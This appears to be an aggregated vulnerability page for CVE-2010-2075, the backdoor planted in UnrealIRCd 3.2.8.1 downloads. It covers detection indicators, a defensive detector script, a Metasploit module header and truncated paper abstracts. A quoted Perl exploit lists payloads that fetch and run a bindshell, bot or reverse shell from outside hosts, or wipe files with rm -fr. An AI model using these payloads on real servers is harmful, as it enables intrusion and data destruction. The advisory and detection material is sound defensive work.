# CVE-2010-2075
Published 2010-06-15
Priority: P274 · high · CVSS 2.0 score 7.5 (vector AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 83.53% (99.6th percentile)
UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.
## Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| unrealircd | unrealircd | — | — |
## Detection & IOCs (extracted from sources)
- Detect the backdoor trigger string `AB;` sent as the first bytes of a TCP connection to the IRC port (default 6667); any data following `AB;` on the same line is executed as a shell command on the server.
- Monitor for IRC server processes spawning child processes (e.g., /bin/sh) or making outbound connections to port 4444, which indicates a reverse shell established via the backdoor.
- Alert on wget activity from /tmp by the ircd process, particularly downloading a file and then running chmod +x on it, as this matches known payload delivery chains for this backdoor.
- The backdoor is triggered via the DEBUG3_DOLOG_SYSTEM macro; look for UnrealIRCd version 3.2.8.1 in the environment, as it is the only affected version.
- The backdoor was only present in the Unreal3.2.8.1.tar.gz distributed from certain mirror sites during a specific window; official/clean distributions of the same version number are not affected.
- The Metasploit module requires the payload type to be one of `generic`, `perl`, `ruby`, `bash`, `telnet`; payloads outside this set will not function with the exploit.
- The exploit payload space is limited to 1024 bytes; commands exceeding this size will not be delivered successfully.
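The first three detection points above, written out as runnable checks. This is an added defender-side example, not part of the CVE record or of any source it links; the event-line format, the `Alert` type and the sample data are constructed for illustration and assume no particular sensor.

```python
"""Defender-side checks for CVE-2010-2075: check_stream() flags the 'AB;'
trigger at the start of a client stream to the IRC port; check_host_events()
applies the process/network IOCs to event lines in a constructed format
("<exec|connect> <parent> <target> [extra]"), not any real sensor's."""
import re
from typing import NamedTuple

IRC_PORTS = {6667}           # default IRC port named in the IOC list
TRIGGER = b"AB;"             # backdoor trigger string
EVENT_RE = re.compile(r"^(exec|connect)\s+(\S+)\s+(\S+)\s*(.*)$")


class Alert(NamedTuple):
    rule: str
    detail: str


def check_stream(dst_port, first_bytes):
    """Inspect the first line a client sends on a new TCP connection."""
    if dst_port not in IRC_PORTS or not first_bytes.startswith(TRIGGER):
        return []
    # The trojan hands everything after 'AB;' up to the line end to the shell.
    cmd = first_bytes.split(b"\n", 1)[0][len(TRIGGER):]
    return [Alert("unreal_backdoor_trigger", cmd.decode(errors="replace").strip())]


def check_host_events(lines):
    """Apply the process/network IOCs to event lines from the ircd host."""
    alerts = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m or m.group(2) != "ircd":
            continue  # only activity whose parent is the IRC daemon matters
        ev, _, target, extra = m.groups()
        if ev == "exec" and target in ("/bin/sh", "/bin/bash"):
            alerts.append(Alert("ircd_spawns_shell", line))
        elif ev == "exec" and target.endswith("wget") and "/tmp" in extra:
            alerts.append(Alert("ircd_wget_from_tmp", line))
        elif ev == "connect" and target.endswith(":4444"):
            alerts.append(Alert("ircd_outbound_4444", line))
    return alerts


# Constructed sample events (not real telemetry); only the first three match.
SAMPLE_EVENTS = [
    "exec ircd /bin/sh -c 'cd /tmp; wget http://example.invalid/b -O b'",
    "exec ircd /usr/bin/wget cwd=/tmp",
    "connect ircd 192.0.2.10:4444",
    "exec sshd /bin/sh",
    "connect ircd 192.0.2.20:6667",
]
```

Feed `check_stream` the destination port and the first bytes of each new client connection, and `check_host_events` a stream of process-exec and outbound-connect events keyed by parent process name.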
No detection rules found.
## Exploit-DB: UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)
exploitdb · 2010-12-05
```ruby
##
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
			'Description'    => %q{
					This module exploits a malicious backdoor that was added to the
				Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
				Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11227 $'
```
## Exploit-DB: UnrealIRCd 3.2.8.1 - Remote Downloader/Execute
exploitdb · 2010-06-13
```perl
#!/usr/bin/perl
# Unreal3.2.8.1 Remote Downloader/Execute Trojan
# DO NOT DISTRIBUTE -PRIVATE-
# -iHaq (2l8)

use Socket;
use IO::Socket;

## Payload options
my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &';
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';
my $payload4 = 'AB; killall ircd';
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *';

$host = "";
$port = "";
$type = "";

$host = @ARGV[0];
$port = @ARGV[1];
$type = @ARGV[2];

if ($host eq "") { usage(); }
if ($port eq "") { usage(
```
## Metasploit: UnrealIRCD 3.2.8.1 Backdoor Command Execution
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
## arXiv: PenHeal: A Two-Stage LLM Framework for Automated Pentesting and Optimal Remediation
arxiv_fulltext · 2024-07-25
Junjie Huang (New York University Shanghai, Shanghai, China); Quanyan Zhu (New York University, New York, USA)
### Abstract
Recent advances in Large Language Models (LLMs) have shown significant potential in enhancing cybersecurity defenses against sophisticated threats. LLM-based penetration testing is an essential step in automating system security evaluations by identifying vulnerabilities. Remediation, the subsequent crucial step, addresses these discovered vulnerabilities. Since details about vulnerabilities, exploitation methods, and software versions offer crucial insights into system weaknesses, integrating penetration testing with vulnerability remedia
## arXiv: Autosploit: A Fully Automated Framework for Evaluating the Exploitability of Security Vulnerabilities
arxiv_fulltext · 2020-06-30
Noam Moscovich [1], Ron Bitton [1], Yakov Mallah [1], Masaki Inokuchi [2], Tomohiko Yagyu [2], Yuval Elovici [1] and Asaf Shabtai [1]
[1] Dept. of Software and Information Systems Engineering, Ben-Gurion University of the Negev; [2] NEC Corporation
### Abstract
The existence of a security vulnerability in a system does not necessarily mean that it can be exploited. In this research, we introduce an automated framework for evaluating the exploitability of vulnerabilities. Given a vulnerable environment and relevant exploits, will automatically test the exploits on different configurations of the environment in order to identify the specific properties necessary for successful exploitation of the exi
## arXiv: AIQL: Enabling Efficient Attack Investigation from System Monitoring Data
arxiv_fulltext · 2018-06-07
Peng Gao [1], Xusheng Xiao [2], Zhichun Li [3], Kangkook Jee [3], Fengyuan Xu [4], Sanjeev R. Kulkarni [1], Prateek Mittal [1]
[1] Princeton University; [2] Case Western Reserve University; [3] NEC Laboratories America, Inc.; [4] National Key Lab for Novel Software Technology, Nanjing University
### Abstract
The need for countering Advanced Persistent Threat (APT) attacks has led to the solutions that ubiquitously monitor system activities in each host, and perform timely attack investigation over the monitoring data for analyzing attack provenance. However, existing query systems based on relational
## References
- http://osvdb.org/65445
- http://seclists.org/fulldisclosure/2010/Jun/277
- http://seclists.org/fulldisclosure/2010/Jun/284
- http://secunia.com/advisories/40169
- http://security.gentoo.org/glsa/glsa-201006-21.xml
- http://www.exploit-db.com/exploits/13853
- http://www.openwall.com/lists/oss-security/2010/06/14/11
- http://www.securityfocus.com/bid/40820
- http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
- http://www.vupen.com/english/advisories/2010/1437